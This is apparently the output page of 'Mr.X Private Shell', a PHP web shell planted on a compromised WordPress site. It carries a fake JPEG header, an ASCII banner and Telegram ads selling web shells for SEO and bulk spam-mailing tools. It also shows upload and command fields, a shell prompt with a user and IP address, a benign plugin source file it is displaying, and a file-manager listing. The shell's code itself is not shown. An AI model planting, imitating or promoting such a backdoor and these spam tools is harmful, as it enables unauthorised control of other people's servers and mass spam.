����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

dccreditrepairto@216.73.216.185: ~ $
<?php

/**
 * Define the internationalization functionality
 *
 * Loads and defines the internationalization files for this plugin
 * so that it is ready for translation.
 *
 * @link       http://linkgraph.io
 * @since      1.0.0
 *
 * @package    Metasync
 * @subpackage Metasync/includes
 */

/**
 * Define the internationalization functionality.
 *
 * Loads and defines the internationalization files for this plugin
 * so that it is ready for translation.
 *
 * @since      1.0.0
 * @package    Metasync
 * @subpackage Metasync/includes
 * @author     Shah Rukh Khan <shahrukh@linkgraph.io>
 */
class Metasync_i18n
{


	/**
	 * Load the plugin text domain for translation.
	 *
	 * @since    1.0.0
	 */
	public function load_plugin_textdomain()
	{

		// echo dirname( dirname( plugin_basename( __FILE__ ) ) ) . '/languages/';
		$isLoaded = load_plugin_textdomain(
			'metasync',
			false,
			dirname(dirname(plugin_basename(__FILE__))) . '/languages/'
		);

		// var_dump($isLoaded);
		// echo __('Sync Now', 'metasync');
	}
}

Filemanager

Name Type Size Permission Actions
class-metasync-activator.php File 807 B 0775
class-metasync-common.php File 3.93 KB 0775
class-metasync-deactivator.php File 788 B 0775
class-metasync-errorlogs.php File 4.79 KB 0775
class-metasync-i18n.php File 1.01 KB 0775
class-metasync-loader.php File 4.72 KB 0775
class-metasync-template.php File 1.21 KB 0775
class-metasync.php File 13.47 KB 0775
index.php File 26 B 0775